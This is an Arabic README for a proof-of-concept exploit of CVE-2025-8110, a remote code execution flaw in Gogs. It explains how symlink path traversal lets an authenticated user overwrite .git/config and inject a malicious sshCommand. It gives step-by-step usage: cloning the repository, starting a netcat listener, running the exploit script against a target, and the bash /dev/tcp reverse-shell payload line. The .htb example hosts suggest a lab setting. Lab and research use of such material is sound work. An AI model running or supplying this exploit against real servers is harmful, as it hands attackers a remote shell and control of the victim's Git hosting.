
إثبات مفهوم لاستغلال CVE-2025-8110، ثغرة تنفيذ أكواد عن بُعد (RCE) في Gogs تستغل اجتياز المسار عبر الروابط الرمزية وحقن sshCommand لتسليم قشرة عكسية.
إثبات مفهوم (PoC) لثغرة CVE-2025-8110، وهي ثغرة حرجة في Gogs تسمح بتنفيذ التعليمات البرمجية عن بُعد (RCE) عبر التلاعب بملف .git/config باستخدام تجاوزات الروابط الرمزية وحقن sshCommand.
يستهدف هذا الاستغلال ثغرة تجاوز المسار (Path Traversal) في إدارة محتوى واجهة برمجة تطبيقات Gogs. يمكن للمستخدم المُصادَق أن:
.git/config الداخلي.sshCommand خبيثًا لتنفيذ قشرة عكسية (Reverse Shell) عندما ينفذ الخادم عمليات Git.!, @).Rich.git clone https://github.com/Ghxstsec/CVE-2025-8110.git
cd CVE-2025-8110
ثبّت التبعيات:
pip3 install -r requirements.txt
شغّل المستمع الخاص بك:
nc -lvnp 6666
شغّل الاستغلال:
python3 CVE-2025-8110-RCE.py -u [http://target-gogs.htb:3000](http://target-gogs.htb:3000) -lh <YOUR_IP> -lp 6666 -p 'YourPassword123!'
الوسائط:
sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #
عندما ينفذ Gogs أمر Git يتطلب نقلًا عبر الشبكة (مثل مزامنة مرآة أو فحص مرجع داخلي)، فإنه يستدعي sshCommand، مما يؤدي إلى تفعيل القشرة العكسية.
| الوسيطة | الوصف |
|---|
-u, --url | عنوان URL الأساسي لمثيل Gogs المستهدف (مثل: http://target.htb:3000). |
-lh, --host | عنوان IP للمهاجم (LHOST) الذي ستتصل به القشرة العكسية. |
-lp, --port | منفذ المستمع (LPORT) المُعد على جهازك. |
-p, --password | كلمة المرور لحساب pwnuser لإجراء المصادقة. |
-x, --proxy | (اختياري) يمرر حركة المرور عبر وكيل محلي (الافتراضي: http://localhost:8080). |